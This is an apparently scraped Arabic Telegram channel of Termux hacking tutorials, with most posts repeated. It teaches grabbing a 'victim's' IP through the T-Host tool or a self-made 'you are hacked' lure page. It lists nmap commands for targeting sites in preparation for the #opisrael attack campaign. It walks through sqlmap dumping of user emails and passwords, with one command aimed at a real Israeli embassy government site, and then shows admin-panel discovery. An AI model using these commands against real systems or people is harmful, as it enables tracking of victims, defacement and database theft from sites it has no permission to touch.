#الدرس_الأول
و هو معرفه الاوامر الاساسيه و ماذا تعني ....
اوامر Termux
___
انشاء ملف ( mkdir )
___
لانشاء ملف touch) .txt)
___
( nano ) للتعديل علي ملف
لحفظ الملف ct و x
بعد ذلك y وتسميه الملف
و enter
___
( exit ) للخروج من الملف
___
( clear ) امسح
___
( pwd ) اين انا
___
(ls) لعرض الملفات
___
للرجوع الي الخلف من الملف الموجود عليه( .. cd )
___
لعرض الملفات والمجلدات بالتفصيل ls -l
___
لحذف جميع المجلدات والملفات (* rm -r )
لحذف مجلد واحد ( rm -r )
___
للوصول للجذر ( / cd )
___
لنقل المجلدات والملفات ( mv )
تغير اسم الملفات والمجلدات ( mv )
___
لنسخ الملفات والمجلدات ( cp )
لتغير اسم المجلد او الملف ( cp -r )
___
ــــــــــــــــــــــــــــــــــــ
قنات
ـــأساسيات برنامج Termux
الأوامر الأساسية لعمل هذا التطبيق:
أساسيات :
• نكتب لتثيبيت اي اداة:
الطريقة الاولى:
1. اسم الأداة pkg install
2. نذهب ل اي متصفح googleونكتب:
أ_نكتب اسم الأداة بالشكل(اسم الأداة github).
ب_وبعد نسخ الرابط الأول من الموقع ونذهب للبرنامج ونكتب الأمر التالي:
رابط الأداة git clone
• لحذف أي اداة نكتب الامر:
rm -rf "اسم الاداة" Enter
• ل نسخ الاداة:
ندخل لمكان الاداة او الملف ونضع الامر:
cp -a "الملف" /"الاداة" Enter
• لنقل اي اداة:
ندخل لمكان الاداة او الملف ونضع الامر:
mv -v "اسم الملف" / "الاداة" Enter
• لفتح قائمة الادوات نكتب الامر: ls
• لفتح اي مجلد او اي اداو نكتب الامر: cd
• للخروج من اي مجلد او اداة نكتب الامر: .. cd
• لمسح النبيانات المستخدمة نكتب الامر: clear
• للخروج من اي نافذة نكتب الامر: exit
• لفتح اي اداة نكتب الاوامر التالية:
1. cd "الاداة
2. ls
لتشغيل الاداة نكتب الامر:
1. chmod +x الاداة
2. ls
لبدأ الاداة بالعمل وتكون نهايتها py نكتب:
python. الاداة. py
واذا كانت نهايتها sh نكتب:
الاداة/.
#CS
@M_R_X_H_K ..✉
و هو معرفه الاوامر الاساسيه و ماذا تعني ....
اوامر Termux
___
انشاء ملف ( mkdir )
___
لانشاء ملف touch) .txt)
___
( nano ) للتعديل علي ملف
لحفظ الملف ct و x
بعد ذلك y وتسميه الملف
و enter
___
( exit ) للخروج من الملف
___
( clear ) امسح
___
( pwd ) اين انا
___
(ls) لعرض الملفات
___
للرجوع الي الخلف من الملف الموجود عليه( .. cd )
___
لعرض الملفات والمجلدات بالتفصيل ls -l
___
لحذف جميع المجلدات والملفات (* rm -r )
لحذف مجلد واحد ( rm -r )
___
للوصول للجذر ( / cd )
___
لنقل المجلدات والملفات ( mv )
تغير اسم الملفات والمجلدات ( mv )
___
لنسخ الملفات والمجلدات ( cp )
لتغير اسم المجلد او الملف ( cp -r )
___
ــــــــــــــــــــــــــــــــــــ
قنات
ـــأساسيات برنامج Termux
الأوامر الأساسية لعمل هذا التطبيق:
أساسيات :
• نكتب لتثيبيت اي اداة:
الطريقة الاولى:
1. اسم الأداة pkg install
2. نذهب ل اي متصفح googleونكتب:
أ_نكتب اسم الأداة بالشكل(اسم الأداة github).
ب_وبعد نسخ الرابط الأول من الموقع ونذهب للبرنامج ونكتب الأمر التالي:
رابط الأداة git clone
• لحذف أي اداة نكتب الامر:
rm -rf "اسم الاداة" Enter
• ل نسخ الاداة:
ندخل لمكان الاداة او الملف ونضع الامر:
cp -a "الملف" /"الاداة" Enter
• لنقل اي اداة:
ندخل لمكان الاداة او الملف ونضع الامر:
mv -v "اسم الملف" / "الاداة" Enter
• لفتح قائمة الادوات نكتب الامر: ls
• لفتح اي مجلد او اي اداو نكتب الامر: cd
• للخروج من اي مجلد او اداة نكتب الامر: .. cd
• لمسح النبيانات المستخدمة نكتب الامر: clear
• للخروج من اي نافذة نكتب الامر: exit
• لفتح اي اداة نكتب الاوامر التالية:
1. cd "الاداة
2. ls
لتشغيل الاداة نكتب الامر:
1. chmod +x الاداة
2. ls
لبدأ الاداة بالعمل وتكون نهايتها py نكتب:
python. الاداة. py
واذا كانت نهايتها sh نكتب:
الاداة/.
#CS
@M_R_X_H_K ..✉
#الدرس_الثاني وهو ..
تثبيت الاوامر الاوليه للبرنامج
-------------------------------------------------
أوامر بداية الترمكس
-------------------------------------------------
01- pkg update -y
02- pkg upgrade -y
03- pkg install python -y
04- pkg install python2 -y
05- pkg install python2-dev -y
06- pkg install python3 -y
07- pkg install java -y
08- pkg install fish -y
09- pkg install ruby -y
10- pkg install help -y
11- pkg install git -y
12- pkg install host -y
13- pkg install php -y
14- pkg install perl -y
15- pkg install nmap -y
16- pkg install bash -y
17- pkg install clang -y
18- pkg install nano -y
19- pkg install w3m -y
20- pkg install havij -y
21- pkg install hydra -y
22- pkg install figlet -y
23- pkg install cowsay -y
24- pkg install curl -y
25- pkg install tar -y
26- pkg install zip -y
27- pkg install unzip -y
28- pkg install tor -y
29- pkg install google -y
30- pkg install sudo -y
31- pkg install wget -y
32- pkg install wireshark -y
33- pkg install wgetrc -y
34- pkg install wcalc -y
35- pkg install bmon -y
36- pkg install vpn -y
37- pkg install unrar -y
38- pkg install toilet -y
39- pkg install proot -y
40- pkg install net-tools -y
41- pkg install golang -y
42- pkg install chroot -y
43- termux-chroot -y
44- pkg install macchanger -y
45- pkg install openssl -y
46- pkg install cmatrix -y
47- pkg install openssh -y
48- pkg install wireshark -y
49- termux-setup-storage -y
50- pkg install macchanger -y
51- apt update && apt upgrade -y
-------------------------------------------------
اضغط فحسب على الامر والصق
-------------------------------------------------
#CS
@M_R_X_H_K ..✉
تثبيت الاوامر الاوليه للبرنامج
-------------------------------------------------
أوامر بداية الترمكس
-------------------------------------------------
01- pkg update -y
02- pkg upgrade -y
03- pkg install python -y
04- pkg install python2 -y
05- pkg install python2-dev -y
06- pkg install python3 -y
07- pkg install java -y
08- pkg install fish -y
09- pkg install ruby -y
10- pkg install help -y
11- pkg install git -y
12- pkg install host -y
13- pkg install php -y
14- pkg install perl -y
15- pkg install nmap -y
16- pkg install bash -y
17- pkg install clang -y
18- pkg install nano -y
19- pkg install w3m -y
20- pkg install havij -y
21- pkg install hydra -y
22- pkg install figlet -y
23- pkg install cowsay -y
24- pkg install curl -y
25- pkg install tar -y
26- pkg install zip -y
27- pkg install unzip -y
28- pkg install tor -y
29- pkg install google -y
30- pkg install sudo -y
31- pkg install wget -y
32- pkg install wireshark -y
33- pkg install wgetrc -y
34- pkg install wcalc -y
35- pkg install bmon -y
36- pkg install vpn -y
37- pkg install unrar -y
38- pkg install toilet -y
39- pkg install proot -y
40- pkg install net-tools -y
41- pkg install golang -y
42- pkg install chroot -y
43- termux-chroot -y
44- pkg install macchanger -y
45- pkg install openssl -y
46- pkg install cmatrix -y
47- pkg install openssh -y
48- pkg install wireshark -y
49- termux-setup-storage -y
50- pkg install macchanger -y
51- apt update && apt upgrade -y
-------------------------------------------------
اضغط فحسب على الامر والصق
-------------------------------------------------
#CS
@M_R_X_H_K ..✉
#درس_جديد
تلغيم و الحصول علي ip الضحيه
هنالك طرق كثيرة
السلام عليكم ورحمة الله وبركاته
شرح اليوم عن جلب ip الضحيه عبر طرق مختلفه
هنالك أكثر من 5 طرق لجلب ip الضحيه سوف اشرح لكم طريقتين منهما
الطريقه الاولي عن طريق أداة T-HOST
و الثانيه عن طريق أداة تصنعها بنفسك و هذي اضمن من أداة T-HOST
بسم الله نبدا
الطريقه الاولي أداة T-HOST
أوامر تثبيتها
apt install git
git clone https://github.com/Bhai4You/T-Host
cd T-Host
chmod +x requirement.sh 127.0.0.1.sh
bash requirement.sh
أوامر تشغيل الأداة
bash 127.0.0.1.sh
و بعدها راح يطلب منك اسم للصورة مثلا راح يكون
Cs.jpg
و بعدها راح يقول لك اعطي اسم للصفحة تبعك اختار اي اسم تريد
Cs
و بعدها راح يطلب حجم و عرض للصورة اختر الحجم المناسب لك
و بعدها راح تدخل ip تبعك و البورت المناسب انا اخترت 4444
و بعدها اضغط انتر و استني راح يطلع لكم رابط مثل هذا https://pactus.serveo.net
تقم بارساله للضحيه من غير إغلاق أداة T-HOST
بعد ما الضحيه يدخل عليه يتم جلب ip تبعه
#CS
@M_R_X_H_K ..✉
تلغيم و الحصول علي ip الضحيه
هنالك طرق كثيرة
السلام عليكم ورحمة الله وبركاته
شرح اليوم عن جلب ip الضحيه عبر طرق مختلفه
هنالك أكثر من 5 طرق لجلب ip الضحيه سوف اشرح لكم طريقتين منهما
الطريقه الاولي عن طريق أداة T-HOST
و الثانيه عن طريق أداة تصنعها بنفسك و هذي اضمن من أداة T-HOST
بسم الله نبدا
الطريقه الاولي أداة T-HOST
أوامر تثبيتها
apt install git
git clone https://github.com/Bhai4You/T-Host
cd T-Host
chmod +x requirement.sh 127.0.0.1.sh
bash requirement.sh
أوامر تشغيل الأداة
bash 127.0.0.1.sh
و بعدها راح يطلب منك اسم للصورة مثلا راح يكون
Cs.jpg
و بعدها راح يقول لك اعطي اسم للصفحة تبعك اختار اي اسم تريد
Cs
و بعدها راح يطلب حجم و عرض للصورة اختر الحجم المناسب لك
و بعدها راح تدخل ip تبعك و البورت المناسب انا اخترت 4444
و بعدها اضغط انتر و استني راح يطلع لكم رابط مثل هذا https://pactus.serveo.net
تقم بارساله للضحيه من غير إغلاق أداة T-HOST
بعد ما الضحيه يدخل عليه يتم جلب ip تبعه
#CS
@M_R_X_H_K ..✉
GitHub
GitHub - Bhai4You/T-Host: There's No Place Like 127.0.0.1 ( Termux )
There's No Place Like 127.0.0.1 ( Termux ). Contribute to Bhai4You/T-Host development by creating an account on GitHub.
السلام عليكم ورحمة الله وبركاته
الطريقه الثانيه ..
بسم الله نبدأ. ...
اولا راح نثبت الأمر php
pkg install php
اول خطوة راح نشي ملف داخل الهوم تبع termux ب اسم CS
mkdir CS
بعدها لو كتبت ls
راح يظهر لك ملف ب اسم CS مع الأدوات تبعك
ثانيا ....
راح ننشي ملف index بداخل ملف CS
اولا راح ندخل ملف CS عبر الأمر
cd CS
بعدها
nano index.html
راح يفتح لنا صفحه راح نكتب بداخلها وسم html
<html>
<head>
<title>مرحبا بكم في مجر الظلام </title>
</head>
<body bgcolor= blue >
<center>
<img src= mama.jpg width= 100 height= 100 />
</center>
<font color=red size= 10px face= tahoma >
<h1> <p align= center > <b>you are hacked by saja <br> </h1>
<font color=white size= 10px face= tahoma >
<h3> <p align=center> مرحبا بكم في مجر الظلام </h3>
<h3>معكم <p align=center> CS<b> </h3>
</body>
</html>
بعدها نعمل حفظ
الحين راح نجلب الصورة تبعنا من ال sdcard
اولا راح نضع الصورة مع الملفات mama.jpg
ونكتب
cd /sdcard
و بعدها
cp mama.jpg/$HOME/CS
كدا بقي عندنا صورة وملف html
كدا انا أنشأت index حقي
ح انقل أو نسخ ملف CS كلو الي الذاكرة
mv CS /sdcard
لو فتحت الذاكرة الداخليه ح تلقي الملف اتنقل وبداخله
صورة و ملف html
نرجع termux
php -S 127.0.0.1:2340 -t /sdcard/CS
بظهر ليك رابط نسخ و أرسله للضحية
#CS
@M_R_X_H_K ..✉
الطريقه الثانيه ..
بسم الله نبدأ. ...
اولا راح نثبت الأمر php
pkg install php
اول خطوة راح نشي ملف داخل الهوم تبع termux ب اسم CS
mkdir CS
بعدها لو كتبت ls
راح يظهر لك ملف ب اسم CS مع الأدوات تبعك
ثانيا ....
راح ننشي ملف index بداخل ملف CS
اولا راح ندخل ملف CS عبر الأمر
cd CS
بعدها
nano index.html
راح يفتح لنا صفحه راح نكتب بداخلها وسم html
<html>
<head>
<title>مرحبا بكم في مجر الظلام </title>
</head>
<body bgcolor= blue >
<center>
<img src= mama.jpg width= 100 height= 100 />
</center>
<font color=red size= 10px face= tahoma >
<h1> <p align= center > <b>you are hacked by saja <br> </h1>
<font color=white size= 10px face= tahoma >
<h3> <p align=center> مرحبا بكم في مجر الظلام </h3>
<h3>معكم <p align=center> CS<b> </h3>
</body>
</html>
بعدها نعمل حفظ
الحين راح نجلب الصورة تبعنا من ال sdcard
اولا راح نضع الصورة مع الملفات mama.jpg
ونكتب
cd /sdcard
و بعدها
cp mama.jpg/$HOME/CS
كدا بقي عندنا صورة وملف html
كدا انا أنشأت index حقي
ح انقل أو نسخ ملف CS كلو الي الذاكرة
mv CS /sdcard
لو فتحت الذاكرة الداخليه ح تلقي الملف اتنقل وبداخله
صورة و ملف html
نرجع termux
php -S 127.0.0.1:2340 -t /sdcard/CS
بظهر ليك رابط نسخ و أرسله للضحية
#CS
@M_R_X_H_K ..✉
بعد معرفه ip يمكننا تحديد موقعه و معرفه المعلومات اللازمة عن طريق هذا الشرح
https://youtu.be/D2atf0ucJZA
#database
https://youtu.be/D2atf0ucJZA
#database
[نبدا الشرح]™..........
================
طيب كلنا نزلنا برنامج Termux تمام
حنعمل الامر دا [apt update]™.......
وتاني الامر دا [apt upgrade]™......
انتا لازم كل ما تدخل علي الابرنامج تكتب الامرين ديل
وبعد انتها update و upgrade™........
نثبت الادة[git]عبر الامر
[apt install git]
وعن طريق الاداة دي تقدر تثبت اداة [Real-DNS]تمام™.......
وبعد ما ثبته الاداة git تثبت الاداة
[python2]
عن طريق الامر[apt install python2]
[تمام كدا]
بعد ما ثبتنا جميع الادوات المطلوبه لي
تثبيت الاداة [Real-DNS]™.........
ركزو معايا شويه هنا تمام تكتب الرابط دا
git clone https://github.com/HackeRStrategy/Real-Scann-DNS
تنسخ الرابط دا وترجع لي البرنامج
وتقوم بي لصق الرابط في البرنامج تمام
وكدا جاري تثبيت [Real-DNS]™......
وبعد ما تم تثبيت الاداة حنجي نفعل الاداة تمام™..........
ادخل الاوامر بي الترتيب تمام........
1_ ls
2_ cd Real-Scann-DNS
3_ ls
4_ chmod + x Real-DNS
5_ python2 Real-DNS
تمام وحتلاقي انو الاداة فتحت معاك™..
تمام كدا ثبتنا اداة [Real-DNS]™......
طيب قول خرجت من البرنامج وحابي افتح الاداة طيب تدخل الاوامر دي
دا امر مختصر.....
ls && cd Tool-Web-RS && ls && cd Real-Scann-DNS && python2 Real-DNS
والباقي في الشرح القادم™............
#CS
================
طيب كلنا نزلنا برنامج Termux تمام
حنعمل الامر دا [apt update]™.......
وتاني الامر دا [apt upgrade]™......
انتا لازم كل ما تدخل علي الابرنامج تكتب الامرين ديل
وبعد انتها update و upgrade™........
نثبت الادة[git]عبر الامر
[apt install git]
وعن طريق الاداة دي تقدر تثبت اداة [Real-DNS]تمام™.......
وبعد ما ثبته الاداة git تثبت الاداة
[python2]
عن طريق الامر[apt install python2]
[تمام كدا]
بعد ما ثبتنا جميع الادوات المطلوبه لي
تثبيت الاداة [Real-DNS]™.........
ركزو معايا شويه هنا تمام تكتب الرابط دا
git clone https://github.com/HackeRStrategy/Real-Scann-DNS
تنسخ الرابط دا وترجع لي البرنامج
وتقوم بي لصق الرابط في البرنامج تمام
وكدا جاري تثبيت [Real-DNS]™......
وبعد ما تم تثبيت الاداة حنجي نفعل الاداة تمام™..........
ادخل الاوامر بي الترتيب تمام........
1_ ls
2_ cd Real-Scann-DNS
3_ ls
4_ chmod + x Real-DNS
5_ python2 Real-DNS
تمام وحتلاقي انو الاداة فتحت معاك™..
تمام كدا ثبتنا اداة [Real-DNS]™......
طيب قول خرجت من البرنامج وحابي افتح الاداة طيب تدخل الاوامر دي
دا امر مختصر.....
ls && cd Tool-Web-RS && ls && cd Real-Scann-DNS && python2 Real-DNS
والباقي في الشرح القادم™............
#CS
GitHub
GitHub - HackeRStrategy/Real-Scann-DNS: Herramienta que sirve para escanear completamente una página web.
Herramienta que sirve para escanear completamente una página web. - HackeRStrategy/Real-Scann-DNS
【بســم الله الرحــــــمن الرحــــــــــيم】
شرح اليوم تثبيت اداة Red Hawk لي تتبع الهوست وعمل اسكان لي اي موقع
الاوامر:-
❶ apt update && apt upgrade -y
❷ apt install python && apt install
git -y
❸ git clone https://github.com/Tuhinshubhra/RED_HAWK
❹ cd RED_HAWK
❺ apt install php -y
❻ php rhawk.php
واكتب اسم الهوست او الموقع 👍
#CS
شرح اليوم تثبيت اداة Red Hawk لي تتبع الهوست وعمل اسكان لي اي موقع
الاوامر:-
❶ apt update && apt upgrade -y
❷ apt install python && apt install
git -y
❸ git clone https://github.com/Tuhinshubhra/RED_HAWK
❹ cd RED_HAWK
❺ apt install php -y
❻ php rhawk.php
واكتب اسم الهوست او الموقع 👍
#CS
GitHub
GitHub - Tuhinshubhra/RED_HAWK: All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool…
All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all penetration testers - Tuhinshubhra/RED_HAWK
السلام عليكم
أتيت لكم بهذه الاوامر المهمة الخاصة بأداة nmap لاستهداف المواقع وغيرها في اطار شروحاتنا للمبتدئين من أجل عملية #opisrael يوم السابع من هذا الشهر :
1- اوامر ال Nmap لعمل Scan على الهدف
لعمل اسكان ل ip واحد فقط : nmap 192.168.1.1
لعمل اسكان لهوست : nmap www.testhostname.com
لعمل اسكان لمجموعة من الا بى : nmap 192.168.1.1-20
لعمل اسكان على سب نت معين : nmap 192.168.1.0/24
لعمل اسكان من ملف text : nmap -iL list-of-ips.txt
========================================
2 - عمل اسكان على البورتات
سكان بورت واحد فقط : nmap -p 22 192.168.1.1
سكان مجموعة من البورتات : nmap -p 1-100 192.168.1.1
سكان سريع ل 100 مشهورين : nmap -F 192.168.1.1
سكان على 65535 بورت : nmap -p- 192.168.1.1
========================================
3 - فحص نوع البورتات المستخدمة TCP / UDP
سكان عن طريق اتصال من نوع TCP : nmap -sT 192.168.1.1
سكان العادى TCP/Syn : nmap -sS 192.168.1.1
سكان على بورتات ال UDP : nmap -sU -p 123,161,162 192.168.1.1
========================================
4 - الخدمات وتحديد نظام التشغيل
لمعرفة نظام التشغيل والخدمات الشغالة : nmap -A 192.168.1.1
لمعرفة الخدمات الشغالة : nmap -sV 192.168.1.1
لعمل banner grabbing خفيف لكي لايحدث Noise وانت تقوم بالسكان : nmap -sV --version-intensity 0 192.168.1.1
========================================
5 - لاستخراج ملف بالمعلومات التي جمعتها بال Nmap
الامر العادى للحفظ : nmap -oN outputfile.txt 192.168.1.1
لحفظ الملف على شكل XML : nmap -oX outputfile.xml 192.168.1.1
لحفظة بجميع الفورمات الموجودة : nmap -oA outputfile 192.168.1.1
========================================
6 - لمعرفة وجود ثغرة Heartbleed SSL
nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24
========================================
7 - معرفة معلومات اكثر عن ال IP
nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24
========================================
طبعاً اداة ال Nmap اداة قوية في مجال الشبكات او اختبار الاختراق
من يريد التعرف على الاداة اكثر هذه بعض الكتب المفيدة
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
++++
Nmap 6: Network exploration and security auditing Cookbook Paperback – November 23, 20
#حاجه مهمة طبعا ح تجيب نوع المتصفحات بالامر دا طبعا بعد تجيب الايبي
nmap -sV 127.0.0.1/24
تكتب الايبي حق الضحيه طبعا بين ال sV- و ال 24/
#CS
أتيت لكم بهذه الاوامر المهمة الخاصة بأداة nmap لاستهداف المواقع وغيرها في اطار شروحاتنا للمبتدئين من أجل عملية #opisrael يوم السابع من هذا الشهر :
1- اوامر ال Nmap لعمل Scan على الهدف
لعمل اسكان ل ip واحد فقط : nmap 192.168.1.1
لعمل اسكان لهوست : nmap www.testhostname.com
لعمل اسكان لمجموعة من الا بى : nmap 192.168.1.1-20
لعمل اسكان على سب نت معين : nmap 192.168.1.0/24
لعمل اسكان من ملف text : nmap -iL list-of-ips.txt
========================================
2 - عمل اسكان على البورتات
سكان بورت واحد فقط : nmap -p 22 192.168.1.1
سكان مجموعة من البورتات : nmap -p 1-100 192.168.1.1
سكان سريع ل 100 مشهورين : nmap -F 192.168.1.1
سكان على 65535 بورت : nmap -p- 192.168.1.1
========================================
3 - فحص نوع البورتات المستخدمة TCP / UDP
سكان عن طريق اتصال من نوع TCP : nmap -sT 192.168.1.1
سكان العادى TCP/Syn : nmap -sS 192.168.1.1
سكان على بورتات ال UDP : nmap -sU -p 123,161,162 192.168.1.1
========================================
4 - الخدمات وتحديد نظام التشغيل
لمعرفة نظام التشغيل والخدمات الشغالة : nmap -A 192.168.1.1
لمعرفة الخدمات الشغالة : nmap -sV 192.168.1.1
لعمل banner grabbing خفيف لكي لايحدث Noise وانت تقوم بالسكان : nmap -sV --version-intensity 0 192.168.1.1
========================================
5 - لاستخراج ملف بالمعلومات التي جمعتها بال Nmap
الامر العادى للحفظ : nmap -oN outputfile.txt 192.168.1.1
لحفظ الملف على شكل XML : nmap -oX outputfile.xml 192.168.1.1
لحفظة بجميع الفورمات الموجودة : nmap -oA outputfile 192.168.1.1
========================================
6 - لمعرفة وجود ثغرة Heartbleed SSL
nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24
========================================
7 - معرفة معلومات اكثر عن ال IP
nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24
========================================
طبعاً اداة ال Nmap اداة قوية في مجال الشبكات او اختبار الاختراق
من يريد التعرف على الاداة اكثر هذه بعض الكتب المفيدة
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
++++
Nmap 6: Network exploration and security auditing Cookbook Paperback – November 23, 20
#حاجه مهمة طبعا ح تجيب نوع المتصفحات بالامر دا طبعا بعد تجيب الايبي
nmap -sV 127.0.0.1/24
تكتب الايبي حق الضحيه طبعا بين ال sV- و ال 24/
#CS
شرح اليوم هو عن اداة nikto لفحص المواقع من الثغرات والبورتات المفتوحة
اوامر تثبيتها
pkg update
pkg install git
pkg install perl
امر تنصيبها
git clone https://github.com/sullo/nikto
cd nikto
cd program
امر فتح الاداة
perl nikto.pl
امر فحص الموقع المطلوب
perl nikto.pl -h رابط الموقع
بعدها ننتظر حتى يكتمل من الفحص
#CS
اوامر تثبيتها
pkg update
pkg install git
pkg install perl
امر تنصيبها
git clone https://github.com/sullo/nikto
cd nikto
cd program
امر فتح الاداة
perl nikto.pl
امر فحص الموقع المطلوب
perl nikto.pl -h رابط الموقع
بعدها ننتظر حتى يكتمل من الفحص
#CS
GitHub
GitHub - sullo/nikto: Nikto web server scanner
Nikto web server scanner. Contribute to sullo/nikto development by creating an account on GitHub.
اداة #Sudomy هي أداة لتعداد النطاقات الفرعية الهدف منها جمع وتحليل النطاقات الفرعية، وتنفيذ الاستطلاع الآلي لاكتشاف الثغرات (recon) لاختبار الاختراق أو البحث عن الثغرات الأمنية.
https://github.com/screetsec/Sudomy
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
https://github.com/screetsec/Sudomy
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
اداه: sqlmap
$ pkg update && pkg upgrade -y
$ apt install python python2
$ pkg install git
$ git clone https://github.com/sqlmapproject/sqlmap
$ cd sqlmap
$ chmod +x sqlmap.py
$ python2 sqlmap.py
جبت لكم طريقه عمل الأداة sqlmap اختراق موقع مصابة راح تتعلمون منها و سهله و بتفهمون لم تعملون قواعد بيانات راح تشوفون كل شي توصل لكم بداخل تريمكس
موقع مصاب
http://testphp.vulnweb.com/listproducts.php?cat=1
في بعض الأحيان ، يساعد استخدام -time-sec على تسريع العملية ، خاصةً عندما تكون استجابات الخادم بطيئة.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
جلب اسم ال database او قواعد البيانات تبع الموقع عن طريق الامر
sqlmap -u https://embassies.gov.il/cairo/AboutIsrael/Pages/AboutIsraelContent.aspx.php?cat=1 --dbs
اسم الداتا بيز تبع الموقع acuart
بعد طلعنا اسم الداتا بيز راح نطلع اسماء الجداول الموجوده بالموقع و ذلك عن طريق الامر التالي
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
بعد ما طلعنها راح نستخرج ما بداخل جدول user لان فيها user password
جلب ما بداخل جدول user
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
بعدها بدنا نفتح كل الايميلات و اسماء مستخدمين الموقع و باسورداتهم عن طريق امر التالي
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
ننتقل للخطوة التاليه و هي لوحه التحكم و كيف يتم جلبها
عادي جدا عن طريق ادوات كثيرة جدا تجلب لوحه تحكم الموقع
اولها اداه admin finder panel
شرح اداة استخراج لوحة التحكم بعد اختراق أي مواقع
امر تثبيت الأداة
git clone https://github.com/bdblackhat/admin-panel-finder
امر فتح الأداة
cd admin-panel-finder
امر اعطاء الصلاحيات للأداة
chmod 777 admin_panel_finder.py
امر تشغيل الأداة
python2 admin_panel_finder.py
بعدها سوف يطلب رابط الموقع
اكتب رابط الموقع الذي تريد استخراج لوحة التحكم الخاصة به
عند الإنتهاء من التحميل سوف يعطيك رابط لوحة التحكم الخاصة بالموقع
قم بنسخ الرابط ولصقه في المتصفح وتظهر لك لوحة التحكم الخاصة بالموقع
$ pkg update && pkg upgrade -y
$ apt install python python2
$ pkg install git
$ git clone https://github.com/sqlmapproject/sqlmap
$ cd sqlmap
$ chmod +x sqlmap.py
$ python2 sqlmap.py
جبت لكم طريقه عمل الأداة sqlmap اختراق موقع مصابة راح تتعلمون منها و سهله و بتفهمون لم تعملون قواعد بيانات راح تشوفون كل شي توصل لكم بداخل تريمكس
موقع مصاب
http://testphp.vulnweb.com/listproducts.php?cat=1
في بعض الأحيان ، يساعد استخدام -time-sec على تسريع العملية ، خاصةً عندما تكون استجابات الخادم بطيئة.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
جلب اسم ال database او قواعد البيانات تبع الموقع عن طريق الامر
sqlmap -u https://embassies.gov.il/cairo/AboutIsrael/Pages/AboutIsraelContent.aspx.php?cat=1 --dbs
اسم الداتا بيز تبع الموقع acuart
بعد طلعنا اسم الداتا بيز راح نطلع اسماء الجداول الموجوده بالموقع و ذلك عن طريق الامر التالي
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
بعد ما طلعنها راح نستخرج ما بداخل جدول user لان فيها user password
جلب ما بداخل جدول user
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
بعدها بدنا نفتح كل الايميلات و اسماء مستخدمين الموقع و باسورداتهم عن طريق امر التالي
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
ننتقل للخطوة التاليه و هي لوحه التحكم و كيف يتم جلبها
عادي جدا عن طريق ادوات كثيرة جدا تجلب لوحه تحكم الموقع
اولها اداه admin finder panel
شرح اداة استخراج لوحة التحكم بعد اختراق أي مواقع
امر تثبيت الأداة
git clone https://github.com/bdblackhat/admin-panel-finder
امر فتح الأداة
cd admin-panel-finder
امر اعطاء الصلاحيات للأداة
chmod 777 admin_panel_finder.py
امر تشغيل الأداة
python2 admin_panel_finder.py
بعدها سوف يطلب رابط الموقع
اكتب رابط الموقع الذي تريد استخراج لوحة التحكم الخاصة به
عند الإنتهاء من التحميل سوف يعطيك رابط لوحة التحكم الخاصة بالموقع
قم بنسخ الرابط ولصقه في المتصفح وتظهر لك لوحة التحكم الخاصة بالموقع
GitHub
GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
Automatic SQL injection and database takeover tool - sqlmapproject/sqlmap
أداة #NucleiFuzzer هي أداة جميله ومهمه لاكتشاف #الثغرات في #تطبيقات_الويب مثل XSS، SQLi، SSRF، وإعادة التوجيه ، وما إلى ذلك.
📎 رابط الأداة:
https://github.com/0xKayala/NucleiFuzzer
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
📎 رابط الأداة:
https://github.com/0xKayala/NucleiFuzzer
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
تأكد من هوية الأشخاص الذين يراسلونك عبر مواقع التواصل الاجتماعي او اي وسيلة او جهة بسبب حالة طارئة مع إدعائهم أنهم مم اصدقائك أو اقربائك.
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
لا تثق في الصفحات التي تمثل شركات كبيرة او شخصيات عامة والتي لم تقم بالتحقق منها .... وان كنت ترغب في الحصول على مساعدة فافعل ذلك من خلال الجهات الرسمية والموثوقة.
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
في حال تقدمت بطلب عمل لوظيفة عبر الانترنت سيطلب منك حتماً ملئ استمارة الطلب يمكنك فعل ذلك لكن احذر من تدوين رقم حسابك البنكي وبطاقة الإئتمان.
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
〰️➖➖➖➖➖➖〰️
www.tgoop.com/MuhammadAlush0997
تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
